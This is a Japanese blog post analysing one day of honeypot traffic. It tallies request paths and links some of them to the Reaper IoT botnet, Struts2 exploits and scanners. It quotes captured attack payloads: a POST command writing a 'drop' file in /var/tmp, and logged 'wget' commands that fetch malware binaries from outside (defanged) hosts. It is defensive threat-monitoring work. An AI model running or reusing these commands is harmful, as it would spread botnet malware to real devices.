WOWHoneypotの簡易分析(5日目)
WOWhoneypotの2018/6/8(運用5日目)の簡易分析です。
本日のハニポへのアクセス件数は218件、内訳は以下です。
153 [2018-06-08 "POST /command.php
42 [2018-06-08 "GET /
12 [2018-06-08 "GET /index.action
2 [2018-06-08 "GET hxxp://httpheader[.]net/
2 [2018-06-08 "GET /HNAP1/
1 [2018-06-08 "GET /xxbb
1 [2018-06-08 "GET /stssys.htm
1 [2018-06-08 "GET /phpmyadmin
1 [2018-06-08 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180608125925
1 [2018-06-08 "GET hxxp://114.215.240[.]151:83/index.php
1 [2018-06-08 "GET hxxp://112.124.127[.]162:83/index.php
1 [2018-06-08 "GET /cgi/common.cgi
新しいのが多くて、ある意味豊作です。
/command.php がPOSTしている中身は例えば以下です。
cmd=cd /var/tmp && echo -ne \\x04\\x00\\x00\\x00\\x01 >> drop && echo OK
User-Agent: Wget(linux) で単一のIPから来ています。
これはReaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃かと思われます。
Reaperボットネットに関する簡単なまとめ - 忙しい人のためのサイバーセキュリティニュース
/index.action は昨日同様、Sturts2の脆弱性を狙ったものでした。
/stssys.htmについては、以下の記事がありました。プリンタサーバを狙ったもののようです。
neonprimetime security , just trying to help: stssys.htm wget request
xxbbについては、User-Agent: Mozilla/5.0 zgrab/0.x でした。これはZMapベースのアプリケーションレイヤの脆弱性スキャナーのようです。
GitHub - zmap/zgrab: Application layer scanner that operates with ZMap
他のものはよくわかりませんでした。
幾つか来ているGET でhttpで他のIP/サイトから取得しようとしているもの(?)は不明です…。
ハンティングログは以下で前日と同じ内容で回数が増えただけでした。
[2018-06-08 22:18:27+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:18:27+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux
[2018-06-08 22:19:03+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:19:03+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux
[2018-06-08 22:19:26+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:19:26+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux